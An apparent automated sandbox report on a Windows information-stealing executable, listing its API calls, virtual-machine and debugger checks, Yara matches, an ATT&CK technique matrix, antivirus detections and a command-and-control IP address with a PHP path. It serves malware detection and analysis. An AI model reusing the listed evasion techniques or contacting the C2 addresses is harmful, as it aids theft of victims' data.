                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022EB29C push ecx; ret 0_2_022EB2AF
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D0F56 pushfd ; iretd 0_2_022D1078
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26477
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeEvaded block: after key decisiongraph_0-27635
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI coverage: 6.9 %
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022DE697
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022E3B17
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E4B77
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022DEF87
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022E47D7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DE077
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022DDCE7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DF8F1 FindFirstFileA,0_2_022DF8F1
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022DC0D7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022D1937
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022E4107
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DF917
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247026062.000000000067E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareu
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.000000000070A000.00000004.00000020.00020000.00000000.sdmp, QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.000000000070A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247026062.000000000067E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-26350
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-26465
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-26462
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-26476
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-26484
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-26304
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-27889
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeAPI call chain: ExitProcess graph end nodegraph_0-26505
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00692EF4 push dword ptr fs:[00000030h]0_2_00692EF4
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D092B mov eax, dword ptr fs:[00000030h]0_2_022D092B
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E99B7 mov eax, dword ptr fs:[00000030h]0_2_022E99B7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D0D90 mov eax, dword ptr fs:[00000030h]0_2_022D0D90
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022EAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022EAFAF
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022ED151 SetUnhandledExceptionFilter,0_2_022ED151
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022EB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_022EB5A1
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: QmMKz5d4j7.exe PID: 4228, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_022E9867
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_022E7DF7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.QmMKz5d4j7.exe.2350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.QmMKz5d4j7.exe.2350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.22d0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.22d0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2031101975.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QmMKz5d4j7.exe PID: 4228, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.QmMKz5d4j7.exe.2350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.QmMKz5d4j7.exe.2350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.22d0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QmMKz5d4j7.exe.22d0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2031101975.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QmMKz5d4j7.exe PID: 4228, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    QmMKz5d4j7.exe29%ReversingLabs
                    QmMKz5d4j7.exe35%VirustotalBrowse
                    QmMKz5d4j7.exe100%AviraHEUR/AGEN.1310247
                    QmMKz5d4j7.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    http://upx.sf.net0%URL Reputationsafe
                    http://62.122.184.144/9%VirustotalBrowse
                    http://62.122.184.144/f88d87a7e087e100.php10%VirustotalBrowse
                    http://62.122.184.1449%VirustotalBrowse
